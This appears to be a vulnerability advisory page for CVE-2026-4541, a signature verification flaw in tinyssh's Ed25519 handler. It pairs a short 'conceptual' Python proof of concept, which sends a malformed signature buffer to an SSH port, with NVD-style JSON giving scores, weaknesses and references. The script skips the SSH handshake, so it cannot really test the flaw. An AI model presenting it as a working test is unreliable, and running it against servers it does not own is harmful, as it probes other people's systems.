CVE-2026-4541

# Conceptual Proof of Concept for CVE-2026-4541 # This script demonstrates the logic to test the signature verification bypass. # Note: Exploitation requires local access and specific environment setup. import socket import struct def send_malformed_signature(target_ip, target_port): print(f"[*] Connecting to {target_ip}:{target_port}...") try: # Establish a TCP connection to the SSH service s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) # In a real exploit, the SSH protocol handshake (Key Exchange) would happen here. # After establishing a transport layer, the attacker triggers the authentication phase. print("[*] Sending malformed Ed25519 signature payload...") # The vulnerability is in the improper verification in crypto_sign_ed25519_tinyssh.c # We construct a payload that represents a malformed or weak signature. # This buffer is a conceptual representation of the exploit trigger. malformed_sig = b'\x00' * 32 + b'\xFF' * 32 # Send the payload (Simulating the authentication step) s.send(malformed_sig) # Receive response response = s.recv(1024) # Check if the server accepted the invalid signature (indicating vulnerability) if response: print("[+] Payload sent. Check server logs for crash or authentication bypass.") else: print("[-] No response received.") s.close() except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": # Example usage (requires target configuration) # send_malformed_signature("127.0.0.1", 22) pass

{"cve": {"id": "CVE-2026-4541", "sourceIdentifier": "[email protected]", "published": "2026-03-22T09:15:59.683", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in janmojzis tinyssh up to 20250501. Impacted is an unknown function of the file tinyssh/crypto_sign_ed25519_tinyssh.c of the component Ed25519 Signature Handler. This manipulation causes improper verification of cryptographic signature. The attack is restricted to local execution. The attack's complexity is rated as high. The exploitability is considered difficult. The exploit has been published and may be used. Upgrading to version 20260301 is recommended to address this issue. Patch name: 9c87269607e0d7d20174df742accc49c042cff17. Upgrading the affected component is recommended."}, {"lang": "es", "value": "Se ha encontrado una falla en janmojzis tinyssh hasta 20250501. Afectada es una función desconocida del archivo tinyssh/crypto_sign_ed25519_tinyssh.c del componente Gestor de Firma Ed25519. Esta manipulación causa una verificación incorrecta de la firma criptográfica. El ataque está restringido a la ejecución local. La complejidad del ataque se califica como alta. La explotabilidad se considera difícil. El exploit ha sido publicado y puede ser utilizado. Se recomienda actualizar a la versión 20260301 para abordar este problema. Nombre del parche: 9c87269607e0d7d20174df742accc49c042cff17. Se recomienda actualizar el componente afectado. Si desea obtener la mejor calidad de datos de vulnerabilidad, puede que tenga que visitar VulDB."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.1, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 2.5, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:H/Au:S/C:N/I:P/A:N", "baseScore": 1.0, "accessVector": "LOCAL", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 1.5, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-345"}, {"lang": "en", "value": "CWE-347"}]}], "references": [{"url": "https://github.com/janmojzis/tinyssh/", "source": "[email protected]"}, {"url": "https://github.com/janmojzis/tinyssh/commit/9c87269607e0d7d20174df742accc49c042cff17", "source": "[email protected]"}, {"url": "https://github.com/janmojzis/tinyssh/issues/101", "source": "[email protected]"}, {"url": "https://github.com/janmojzis/tinyssh/issues/101#issue-3983586116", "source": "[email protected]"}, {"url": "https://github.com/janmojzis/tinyssh/pull/102", "source": "[email protected]"}, {"url": "https://github.com/janmojzis/tinyssh/releases/tag/20260301", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/774687", "source": "cna ... (truncated)